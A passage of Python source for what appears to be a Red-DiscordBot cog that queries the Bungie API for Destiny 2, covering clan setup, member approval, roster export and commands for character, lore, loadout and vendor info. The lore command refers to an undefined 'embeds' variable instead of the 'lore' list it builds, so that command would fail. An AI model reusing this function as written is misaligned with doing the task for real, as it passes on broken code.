set_clan_id(self, ctx: commands.Context, clan_id: str) -> None:\n \"\"\"\n Set the clan ID for this server\n\n `` Must be either the clan's ID or you can provide\n the clan invite link at the `clan profile` setting on bungie.net\n\n example link: `https://www.bungie.net/en/ClanV2?groupid=1234567`\n the numbers after `groupid=` is the clan ID.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n clan_re = re.compile(\n r\"(https:\\/\\/)?(www\\.)?bungie\\.net\\/.*(groupid=(\\d+))\", flags=re.I\n )\n clan_invite = clan_re.search(clan_id)\n if clan_invite:\n clan_id = clan_invite.group(4)\n try:\n clan_info = await self.get_clan_info(ctx.author, clan_id)\n embed = await self.make_clan_embed(clan_info)\n except Exception:\n log.exception(\"Error getting clan info\")\n return await ctx.send(_(\"I could not find a clan with that ID.\"))\n else:\n await self.config.guild(ctx.guild).clan_id.set(clan_id)\n await ctx.send(_(\"Server's clan set to\"), embed=embed)\n\n async def destiny_pick_profile(\n self, ctx: commands.Context, pending_users: dict\n ) -> Optional[dict]:\n \"\"\"\n Allows a clan admin to pick the user they want to approve in the clan\n \"\"\"\n users = pending_users[\"results\"][:9]\n embed = discord.Embed(\n title=_(\"Pending Clan Members\"),\n description=_(\"React with the user you would like to approve into the clan.\"),\n )\n for index, user in enumerate(pending_users[\"results\"]):\n destiny_name = user[\"destinyUserInfo\"][\"LastSeenDisplayName\"]\n bungie_name = user[\"bungieNetUserInfo\"][\"displayName\"]\n msg = _(\"Destiny/Steam Name: {destiny_name}\\nBungie.net Name: {bungie_name}\").format(\n destiny_name=destiny_name, bungie_name=bungie_name\n )\n embed.add_field(name=_(\"User {count}\").format(count=index + 1), value=msg)\n msg = await ctx.send(embed=embed)\n emojis = ReactionPredicate.NUMBER_EMOJIS[1 : len(users) + 1]\n start_adding_reactions(msg, emojis)\n pred = ReactionPredicate.with_emojis(emojis, msg)\n try:\n await ctx.bot.wait_for(\"reaction_add\", check=pred)\n except asyncio.TimeoutError:\n return None\n else:\n return users[pred.result]\n\n @clan.command(name=\"pending\")\n @commands.bot_has_permissions(embed_links=True)\n @commands.admin_or_permissions(manage_guild=True)\n async def clan_pending(self, ctx: commands.Context) -> None:\n \"\"\"\n Display pending clan members.\n\n Clan admin can further approve specified clan members\n by reacting to the resulting message.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n clan_id = await self.config.guild(ctx.guild).clan_id()\n if not clan_id:\n return await ctx.send(\n _(\n \"No clan ID has been setup for this server. \"\n \"Use `{prefix}destiny clan set` to set one.\"\n ).format(prefix=ctx.clean_prefix)\n )\n clan_pending = await self.get_clan_pending(ctx.author, clan_id)\n if not clan_pending[\"results\"]:\n return await ctx.send(_(\"There is no one pending clan approval.\"))\n approved = await self.destiny_pick_profile(ctx, clan_pending)\n if not approved:\n return await ctx.send(_(\"No one will be approved into the clan.\"))\n try:\n destiny_name = approved[\"destinyUserInfo\"][\"LastSeenDisplayName\"]\n bungie_name = approved[\"bungieNetUserInfo\"][\"displayName\"]\n membership_id = approved[\"destinyUserInfo\"][\"membershipId\"]\n membership_type = approved[\"destinyUserInfo\"][\"membershipType\"]\n await self.approve_clan_pending(\n ctx.author, clan_id, membership_type, membership_id, approved\n )\n except Destiny2APIError as e:\n log.exception(\"error approving clan member.\")\n await ctx.send(str(e))\n else:\n await ctx.send(\n _(\"{destiny_name} AKA {bungie_name} has been approved into the clan.\").format(\n destiny_name=destiny_name, bungie_name=bungie_name\n )\n )\n\n @clan.command(name=\"roster\")\n @commands.bot_has_permissions(embed_links=True)\n @commands.mod_or_permissions(manage_messages=True)\n async def get_clan_roster(self, ctx: commands.Context, output_format: Optional[str]) -> None:\n \"\"\"\n Get the full clan roster\n\n `[output_format]` if `csv` is provided this will upload a csv file of\n the clan roster instead of displaying the output.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n clan_id = await self.config.guild(ctx.guild).clan_id()\n if not clan_id:\n return await ctx.send(\n _(\n \"No clan ID has been setup for this server. \"\n \"Use `{prefix}destiny clan set` to set one.\"\n ).format(prefix=ctx.clean_prefix)\n )\n clan = await self.get_clan_members(ctx.author, clan_id)\n headers = [\n \"Discord Name\",\n \"Discord ID\",\n \"Destiny Name\",\n \"Destiny ID\",\n \"Bungie.net Name\",\n \"Bungie.net ID\",\n \"Last Seen Destiny\",\n \"Steam ID\",\n \"Join Date\",\n ]\n clan_mems = \"\"\n rows = []\n saved_users = await self.config.all_users()\n for member in clan[\"results\"]:\n last_online = datetime.datetime.utcfromtimestamp(\n int(member[\"lastOnlineStatusChange\"])\n )\n join_date = datetime.datetime.strptime(member[\"joinDate\"], \"%Y-%m-%dT%H:%M:%SZ\")\n destiny_name = member[\"destinyUserInfo\"][\"LastSeenDisplayName\"]\n destiny_id = member[\"destinyUserInfo\"][\"membershipId\"]\n clan_mems += destiny_name + \"\\n\"\n discord_id = None\n discord_name = None\n bungie_id = None\n bungie_name = None\n steam_id = None\n try:\n bungie_id = member[\"bungieNetUserInfo\"][\"membershipId\"]\n bungie_name = member[\"bungieNetUserInfo\"][\"displayName\"]\n creds = await self.get_bnet_user(ctx.author, bungie_id)\n steam_id = \"\"\n for cred in creds:\n if \"credentialAsString\" in cred:\n steam_id = cred[\"credentialAsString\"]\n except Exception:\n pass\n for user_id, data in saved_users.items():\n if data[\"oauth\"][\"membership_id\"] == bungie_id:\n discord_user = ctx.guild.get_member(int(user_id))\n if discord_user:\n discord_name = str(discord_user)\n discord_id = discord_user.id\n\n user_info = [\n discord_name,\n f\"'{discord_id}\" if discord_id else None,\n destiny_name,\n f\"'{destiny_id}\" if destiny_id else None,\n bungie_name,\n f\"'{bungie_id}\" if bungie_id else None,\n last_online,\n f\"'{steam_id}\" if steam_id else None,\n str(join_date),\n ]\n rows.append(user_info)\n if output_format == \"csv\":\n outfile = StringIO()\n employee_writer = csv.writer(\n outfile, delimiter=\",\", quotechar='\"', quoting=csv.QUOTE_MINIMAL\n )\n employee_writer.writerow(headers)\n for row in rows:\n employee_writer.writerow(row)\n outfile.seek(0)\n file = discord.File(outfile, filename=\"clan_roster.csv\")\n await ctx.send(file=file)\n elif output_format == \"md\":\n data = tabulate(rows, headers=headers, tablefmt=\"github\")\n file = discord.File(BytesIO(data.encode()), filename=\"clan_roster.md\")\n await ctx.send(file=file)\n else:\n data = tabulate(rows, headers=headers, tablefmt=\"pretty\")\n for page in pagify(data, page_length=1990):\n await ctx.send(box(page, lang=\"css\"))\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True)\n async def user(self, ctx: commands.Context, user: discord.Member = None) -> None:\n \"\"\"\n Display a menu of your basic character's info\n `[user]` A member on the server who has setup their account on this bot.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx, user):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if not user:\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n # await self.save(chars, \"character.json\")\n except Destiny2APIError as e:\n log.error(e, exc_info=True)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n embeds = []\n currency_datas = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\",\n [v[\"itemHash\"] for v in chars[\"profileCurrencies\"][\"data\"][\"items\"]],\n )\n player_currency = \"\"\n for item in chars[\"profileCurrencies\"][\"data\"][\"items\"]:\n quantity = item[\"quantity\"]\n name = currency_datas[str(item[\"itemHash\"])][\"displayProperties\"][\"name\"]\n player_currency += f\"{name}: **{quantity}**\\n\"\n\n for char_id, char in chars[\"characters\"][\"data\"].items():\n info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (\n await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]])\n )[str(char[\"genderHash\"])]\n char_class = (\n await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]])\n )[str(char[\"classHash\"])]\n info += \"{race} {gender} {char_class} \".format(\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n titles = \"\"\n if \"titleRecordHash\" in char:\n # TODO: Add fetch for Destiny.Definitions.Records.DestinyRecordDefinition\n char_title = (\n await self.get_definition(\n \"DestinyRecordDefinition\", [char[\"titleRecordHash\"]]\n )\n )[str(char[\"titleRecordHash\"])]\n title_info = \"**{title_name}**\\n{title_desc}\\n\"\n try:\n gilded = \"\"\n if await self.check_gilded_title(chars, char_title):\n gilded = _(\"Gilded \")\n title_name = (\n f\"{gilded}\"\n + char_title[\"titleInfo\"][\"titlesByGenderHash\"][\n str(char[\"genderHash\"])\n ]\n )\n title_desc = char_title[\"displayProperties\"][\"description\"]\n titles += title_info.format(title_name=title_name, title_desc=title_desc)\n except KeyError:\n pass\n embed = discord.Embed(title=info)\n embed.set_author(name=user.display_name, icon_url=user.avatar_url)\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n if titles:\n # embed.add_field(name=_(\"Titles\"), value=titles)\n embed.set_author(\n name=f\"{user.display_name} ({title_name})\", icon_url=user.avatar_url\n )\n # log.debug(data)\n stats_str = \"\"\n time_played = humanize_timedelta(seconds=int(char[\"minutesPlayedTotal\"]) * 60)\n for stat_hash, value in char[\"stats\"].items():\n stat_info = (await self.get_definition(\"DestinyStatDefinition\", [stat_hash]))[\n str(stat_hash)\n ]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n prog = \"█\" * int(value / 10)\n empty = \"░\" * int((100 - value) / 10)\n bar = f\"{prog}{empty}\"\n if stat_hash == \"1935470627\":\n bar = \"\"\n stats_str += f\"{stat_name}: **{value}** \\n{bar}\\n\"\n stats_str += _(\"Time Played Total: **{time}**\").format(time=time_played)\n embed.description = stats_str\n embed = await self.get_char_colour(embed, char)\n if titles:\n embed.add_field(name=_(\"Titles\"), value=titles)\n embed.add_field(name=_(\"Current Currencies\"), value=player_currency)\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @search.command()\n @commands.bot_has_permissions(embed_links=True)\n async def lore(self, ctx: commands.Context, entry: str = None) -> None:\n \"\"\"\n Find Destiny Lore\n \"\"\"\n try:\n # the below is to prevent blocking reading the large\n # ~130mb manifest files and save on API calls\n task = functools.partial(self.get_entities, entity=\"DestinyLoreDefinition\")\n task = self.bot.loop.run_in_executor(None, task)\n data: dict = await asyncio.wait_for(task, timeout=60)\n except Exception:\n return await ctx.send(_(\"The manifest needs to be downloaded for this to work.\"))\n lore = []\n for entry_hash, entries in data.items():\n em = discord.Embed(title=entries[\"displayProperties\"][\"name\"])\n description = entries[\"displayProperties\"][\"description\"]\n if len(description) < 2048:\n em.description = entries[\"displayProperties\"][\"description\"]\n elif len(description) > 2048 and len(description) < 6000:\n em.description = description[:2048]\n new_desc = description[:2048]\n parts = [new_desc[i : i + 1024] for i in range(0, len(new_desc), 1024)]\n for i in parts:\n em.add_field(name=_(\"Continued\"), value=i)\n\n if entries[\"displayProperties\"][\"hasIcon\"]:\n icon = entries[\"displayProperties\"][\"icon\"]\n em.set_thumbnail(url=f\"{IMAGE_URL}{icon}\")\n lore.append(em)\n if entry:\n for t in lore:\n if entry.lower() in str(t.title).lower():\n print(t.title)\n lore.insert(0, lore.pop(lore.index(t)))\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n async def save(self, data: dict, loc: str = \"sample.json\"):\n if self.bot.user.id not in DEV_BOTS:\n return\n base_path = Path(__file__).parent\n path = base_path / loc\n with path.open(encoding=\"utf-8\", mode=\"w\") as f:\n json.dump(data, f, indent=4, sort_keys=False, separators=(\",\", \" : \"))\n\n @destiny.command(aliases=[\"xûr\"])\n @commands.bot_has_permissions(embed_links=True)\n async def xur(self, ctx: commands.Context, full: bool = False) -> None:\n \"\"\"\n Display a menu of Xûr's current wares\n\n `[full=False]` Show perk definition on Xûr's current wares\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n try:\n chars = await self.get_characters(ctx.author)\n # await self.save(chars, \"characters.json\")\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n for char_id, char in chars[\"characters\"][\"data\"].items():\n # log.debug(char)\n try:\n xur = await self.get_vendor(ctx.author, char_id, \"2190858386\")\n xur_def = (\n await self.get_definition(\"DestinyVendorDefinition\", [\"2190858386\"])\n )[\"2190858386\"]\n except Destiny2APIError:\n log.error(\"I can't seem to see Xûr at the moment\")\n today = datetime.datetime.utcnow()\n friday = today.replace(hour=17, minute=0, second=0) + datetime.timedelta(\n (4 - today.weekday()) % 7\n )\n next_xur = self.humanize_timedelta(timedelta=(friday - today))\n await ctx.send(\n _(\"Xûr's not around, come back in {next_xur}.\").format(next_xur=next_xur)\n )\n return\n break\n # items = [v[\"itemHash\"] for k, v in xur[\"sales\"][\"data\"].items()]\n embeds: List[discord.Embed] = []\n # data = await self.get_definition(\"DestinyInventoryItemDefinition\", items)\n embed = discord.Embed(\n colour=discord.Colour.red(),\n description=xur_def[\"displayProperties\"][\"description\"],\n )\n embed.set_thumbnail(\n url=IMAGE_URL + xur_def[\"displayProperties\"][\"largeTransparentIcon\"]\n )\n embed.set_author(name=\"Xûr's current wares\")\n # location = xur_def[\"locations\"][0][\"destinationHash\"]\n # log.debug(await self.get_definition(\"DestinyDestinationDefinition\", [location]))\n for index, item_base in xur[\"sales\"][\"data\"].items():\n item = (\n await self.get_definition(\n \"DestinyInventoryItemDefinition\", [item_base[\"itemHash\"]]\n )\n )[str(item_base[\"itemHash\"])]\n if not (item[\"equippable\"]):\n continue\n perk_hashes = [\n str(p[\"singleInitialItemHash\"]) for p in item[\"sockets\"][\"socketEntries\"]\n ]\n perk_data = await self.get_definition(\n \"DestinyInventoryItemDefinition\", perk_hashes\n )\n perks = \"\"\n item_embed = discord.Embed(title=item[\"displayProperties\"][\"name\"])\n item_embed.set_thumbnail(url=IMAGE_URL + item[\"displayProperties\"][\"icon\"])\n item_embed.set_image(url=IMAGE_URL + item[\"screenshot\"])\n for perk_hash, perk in perk_data.items():\n properties = perk[\"displayProperties\"]\n if \"Common\" in perk[\"itemTypeAndTierDisplayName\"]:\n continue\n if (\n properties[\"name\"] == \"Empty Mod Socket\"\n or properties[\"name\"] == \"Default Ornament\"\n or properties[\"name\"] == \"Change Energy Type\"\n or properties[\"name\"] == \"Empty Catalyst Socket\"\n ):\n continue\n if \"name\" in properties and \"description\" in properties:\n if not properties[\"name\"]:\n continue\n # await self.save(perk, properties[\"name\"] + \".json\")\n if full:\n perks += \"**{0}** - {1}\\n\".format(\n properties[\"name\"], properties[\"description\"]\n )\n else:\n perks += \"- **{0}**\\n\".format(properties[\"name\"])\n stats_str = \"\"\n if \"armor\" in item[\"equippingBlock\"][\"uniqueLabel\"]:\n total = 0\n for stat_hash, stat_data in xur[\"itemComponents\"][\"stats\"][\"data\"][index][\n \"stats\"\n ].items():\n stat_info = (\n await self.get_definition(\"DestinyStatDefinition\", [stat_hash])\n )[str(stat_hash)]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n stat_value = stat_data[\"value\"]\n prog = \"█\" * int(stat_value / 6)\n empty = \"░\" * int((42 - stat_value) / 6)\n bar = f\"{prog}{empty}\"\n stats_str += f\"{stat_name}: \\n{bar} **{stat_value}**\\n\"\n total += stat_value\n stats_str += _(\"Total: **{total}**\\n\").format(total=total)\n\n msg = (\n item[\"itemTypeAndTierDisplayName\"]\n + \"\\n\"\n + stats_str\n + (item[\"displayProperties\"][\"description\"] + \"\\n\" if full else \"\")\n + perks\n )\n item_embed.description = msg\n embed.insert_field_at(\n 0, name=\"**__\" + item[\"displayProperties\"][\"name\"] + \"__**\\n\", value=msg\n )\n embeds.insert(0, item_embed)\n embeds.insert(0, embed)\n # await ctx.send(embed=embed)\n # await ctx.tick()\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True)\n async def eververse(\n self, ctx: commands.Context, *, item_types: Optional[DestinyEververseItemType]\n ) -> None:\n \"\"\"\n Display items currently available on the Eververse in a menu\n\n `[item_types]` can be one of `ghosts`, `ships`, `sparrows`,\n `shaders`, `ornaments` and `finishers` to filter specific items.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if not item_types:\n item_types = {\"item_types\": [9, 19, 21, 22, 24, 29], \"item_sub_types\": [21, 20]}\n try:\n chars = await self.get_characters(ctx.author)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n embeds: List[discord.Embed] = []\n eververse_sales = {}\n for char_id, char in chars[\"characters\"][\"data\"].items():\n try:\n ev = await self.get_vendor(ctx.author, char_id, \"3361454721\")\n eververse_sales.update(ev[\"sales\"][\"data\"])\n\n except Destiny2APIError:\n log.error(\"I can't seem to see the eververse at the moment\", exc_info=True)\n await ctx.send(_(\"I can't access the eververse at the moment.\"))\n return\n await self.save(eververse_sales, \"eververse.json\")\n embeds = []\n item_hashes = [i[\"itemHash\"] for k, i in eververse_sales.items()]\n item_defs = await self.get_definition(\"DestinyInventoryItemDefinition\", item_hashes)\n item_costs = [c[\"itemHash\"] for k, i in eververse_sales.items() for c in i[\"costs\"]]\n item_cost_defs = await self.get_definition(\n \"DestinyInventoryItemDefinition\", item_costs\n )\n for item_hash, vendor_item in eververse_sales.items():\n item = item_defs[str(vendor_item[\"itemHash\"])]\n if (\n item[\"itemType\"] not in item_types[\"item_types\"]\n and item_types[\"item_types\"] != []\n ):\n # log.debug(\"ignoring item from type %s\" % item[\"itemType\"])\n continue\n if (\n item[\"itemSubType\"] not in item_types[\"item_sub_types\"]\n and item_types[\"item_sub_types\"] != []\n ):\n # log.debug(\"ignoring item from sub type %s\" % item[\"itemSubType\"])\n continue\n embed = discord.Embed()\n embed.description = item[\"displayProperties\"][\"description\"]\n embed.title = item[\"itemTypeAndTierDisplayName\"]\n name = item[\"displayProperties\"][\"name\"]\n icon_url = IMAGE_URL + item[\"displayProperties\"][\"icon\"]\n embed.set_author(name=name, icon_url=icon_url)\n embed.set_thumbnail(url=icon_url)\n cost_str = \"\"\n for costs in vendor_item[\"costs\"]:\n cost = costs[\"quantity\"]\n cost_name = item_cost_defs[str(costs[\"itemHash\"])][\"displayProperties\"][\"name\"]\n cost_str += f\"{cost_name}: **{cost}**\\n\"\n embed.add_field(name=_(\"Cost\"), value=cost_str)\n if \"screenshot\" in item:\n embed.set_image(url=IMAGE_URL + item[\"screenshot\"])\n embeds.append(embed)\n if embeds == []:\n return await ctx.send(_(\"I can't access the eververse at the moment.\"))\n # await ctx.tick()\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True)\n async def spider(self, ctx: commands.Context) -> None:\n \"\"\"\n Display Spiders wares\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n try:\n chars = await self.get_characters(ctx.author)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n for char_id, char in chars[\"characters\"][\"data\"].items():\n try:\n spider = await self.get_vendor(ctx.author, char_id, \"863940356\")\n spider_def = (\n await self.get_definition(\"DestinyVendorDefinition\", [\"863940356\"])\n )[\"863940356\"]\n except Destiny2APIError:\n log.error(\"I can't seem to see the Spider at the moment\", exc_info=True)\n await ctx.send(_(\"I can't access the Spider at the moment.\"))\n return\n break\n\n # await self.save(spider, \"spider.json\")\n currency_datas = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\",\n [v[\"itemHash\"] for v in chars[\"profileCurrencies\"][\"data\"][\"items\"]],\n )\n embed = discord.Embed(description=spider_def[\"displayProperties\"][\"description\"])\n embed.set_thumbnail(\n url=IMAGE_URL + spider_def[\"displayProperties\"][\"largeTransparentIcon\"]\n )\n embed.set_author(\n name=spider_def[\"displayProperties\"][\"name\"]\n + \", \"\n + spider_def[\"displayProperties\"][\"subtitle\"]\n )\n item_hashes = [i[\"itemHash\"] for k, i in spider[\"sales\"][\"data\"].items()]\n item_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_hashes\n )\n item_costs = [\n c[\"itemHash\"] for k, i in spider[\"sales\"][\"data\"].items() for c in i[\"costs\"]\n ]\n item_cost_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_costs\n )\n for key, data in spider[\"sales\"][\"data\"].items():\n item_hash = data[\"itemHash\"]\n\n item = item_defs[str(item_hash)]\n if item[\"itemType\"] in [0, 26]:\n continue\n try:\n costs = data[\"costs\"][0]\n cost = item_cost_defs[str(costs[\"itemHash\"])]\n cost_str = str(costs[\"quantity\"]) + \" \" + cost[\"displayProperties\"][\"name\"]\n except IndexError:\n cost_str = \"None\"\n embed.add_field(name=item[\"displayProperties\"][\"name\"], value=cost_str)\n\n await asyncio.sleep(0)\n player_currency = \"\"\n for item in chars[\"profileCurrencies\"][\"data\"][\"items\"]:\n quantity = item[\"quantity\"]\n name = currency_datas[str(item[\"itemHash\"])][\"displayProperties\"][\"name\"]\n player_currency += f\"{name}: **{quantity}**\\n\"\n embed.add_field(name=_(\"Current Currencies\"), value=player_currency)\n await ctx.send(embed=embed)\n\n @destiny.command(aliases=[\"banshee-44\"])\n @commands.bot_has_permissions(embed_links=True)\n async def banshee(self, ctx: commands.Context) -> None:\n \"\"\"\n Display Banshee-44's wares\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n try:\n chars = await self.get_characters(ctx.author)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n\n for char_id, char in chars[\"characters\"][\"data\"].items():\n try:\n banshee = await self.get_vendor(ctx.author, char_id, \"672118013\")\n banshee_def = (\n await self.get_definition(\"DestinyVendorDefinition\", [\"672118013\"])\n )[\"672118013\"]\n await self.save(banshee, \"banshee.json\")\n except Destiny2APIError:\n log.error(\n \"I can't seem to see the Banshee-44's wares at the moment\", exc_info=True\n )\n await ctx.send(_(\"I can't access the Banshee-44 at the moment.\"))\n return\n break\n # await self.save(spider, \"spider.json\")\n embed = discord.Embed(description=banshee_def[\"displayProperties\"][\"description\"])\n embed.set_thumbnail(\n url=IMAGE_URL + banshee_def[\"displayProperties\"][\"largeTransparentIcon\"]\n )\n embed.set_author(\n name=banshee_def[\"displayProperties\"][\"name\"]\n + \", \"\n + banshee_def[\"displayProperties\"][\"subtitle\"]\n )\n item_hashes = [i[\"itemHash\"] for k, i in banshee[\"sales\"][\"data\"].items()]\n item_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_hashes\n )\n item_costs = [\n c[\"itemHash\"] for k, i in banshee[\"sales\"][\"data\"].items() for c in i[\"costs\"]\n ]\n item_cost_defs = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", item_costs\n )\n for key, data in banshee[\"sales\"][\"data\"].items():\n item_hash = data[\"itemHash\"]\n\n item = item_defs[str(item_hash)]\n if item[\"itemType\"] in [0]:\n continue\n try:\n costs = data[\"costs\"][0]\n cost = item_cost_defs[str(costs[\"itemHash\"])]\n cost_str = str(costs[\"quantity\"]) + \" \" + cost[\"displayProperties\"][\"name\"]\n except IndexError:\n cost_str = \"None\"\n\n embed.add_field(name=item[\"displayProperties\"][\"name\"], value=cost_str)\n\n await asyncio.sleep(0)\n await ctx.send(embed=embed)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def loadout(\n self, ctx: commands.Context, full: Optional[bool] = False, user: discord.Member = None\n ) -> None:\n \"\"\"\n Display a menu of each character's equipped weapons and their info\n\n `[full=False]` Display full information about weapons equipped.\n `[user]` A member on the server who has setup their account on this bot.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx, user):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if not user:\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n embeds = []\n\n for char_id, char in chars[\"characters\"][\"data\"].items():\n info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (\n await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]])\n )[str(char[\"genderHash\"])]\n char_class = (\n await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]])\n )[str(char[\"classHash\"])]\n info += \"{race} {gender} {char_class} \".format(\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n titles = \"\"\n if \"titleRecordHash\" in char:\n # TODO: Add fetch for Destiny.Definitions.Records.DestinyRecordDefinition\n char_title = (\n await self.get_definition(\n \"DestinyRecordDefinition\", [char[\"titleRecordHash\"]]\n )\n )[str(char[\"titleRecordHash\"])]\n title_info = \"**{title_name}**\\n{title_desc}\\n\"\n try:\n gilded = \"\"\n if await self.check_gilded_title(chars, char_title):\n gilded = _(\"Gilded \")\n title_name = (\n f\"{gilded}\"\n + char_title[\"titleInfo\"][\"titlesByGenderHash\"][\n str(char[\"genderHash\"])\n ]\n )\n title_desc = char_title[\"displayProperties\"][\"description\"]\n titles += title_info.format(title_name=title_name, title_desc=title_desc)\n except KeyError:\n pass\n embed = discord.Embed(title=info)\n embed.set_author(name=user.display_name, icon_url=user.avatar_url)\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n if titles:\n # embed.add_field(name=_(\"Titles\"), value=titles)\n embed.set_author(\n name=f\"{user.display_name} ({title_name})\", icon_url=user.avatar_url\n )\n char_items = chars[\"characterEquipment\"][\"data\"][char_id][\"items\"]\n item_list = [i[\"itemHash\"] for i in char_items]\n # log.debug(item_list)\n items = await self.get_definition(\"DestinyInventoryItemDefinition\", item_list)\n # log.debug(items)\n for item_hash, data in items.items():\n # log.debug(data)\n for item in char_items:\n # log.debug(item)\n if data[\"hash\"] == item[\"itemHash\"]:\n instance_id = item[\"itemInstanceId\"]\n item_instance = chars[\"itemComponents\"][\"instances\"][\"data\"][instance_id]\n if not item_instance[\"isEquipped\"]:\n continue\n\n if not (data[\"equippable\"] and data[\"itemType\"] == 3):\n continue\n name = data[\"displayProperties\"][\"name\"]\n desc = data[\"displayProperties\"][\"description\"]\n item_type = data[\"itemTypeAndTierDisplayName\"]\n try:\n light = item_instance[\"primaryStat\"][\"value\"]\n except KeyError:\n light = \"\"\n perk_list = chars[\"itemComponents\"][\"perks\"][\"data\"][instance_id][\"perks\"]\n perk_hashes = [p[\"perkHash\"] for p in perk_list]\n perk_data = await self.get_definition(\n \"DestinySandboxPerkDefinition\", perk_hashes\n )\n perks = \"\"\n for perk_hash, perk in perk_data.items():\n properties = perk[\"displayProperties\"]\n if \"name\" in properties and \"description\" in properties:\n if full:\n perks += \"**{0}** - {1}\\n\".format(\n properties[\"name\"], properties[\"description\"]\n )\n else:\n perks += \"- **{0}**\\n\".format(properties[\"name\"])\n\n value = f\"**{light}** {item_type}\\n{perks}\"\n embed.add_field(name=name, value=value, inline=True)\n # log.debug(data)\n stats_str = \"\"\n for stat_hash, value in char[\"stats\"].items():\n stat_info = (await self.get_definition(\"DestinyStatDefinition\", [stat_hash]))[\n str(stat_hash)\n ]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n prog = \"█\" * int(value / 10)\n empty = \"░\" * int((100 - value) / 10)\n bar = f\"{prog}{empty}\"\n if stat_hash == \"1935470627\":\n bar = \"\"\n stats_str += f\"{stat_name}: **{value}** \\n{bar}\\n\"\n embed.description = stats_str\n embed = await self.get_char_colour(embed, char)\n\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def gambit(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu of each characters gambit stats\n \"\"\"\n await ctx.invoke(self.stats, \"allPvECompetitive\")\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def 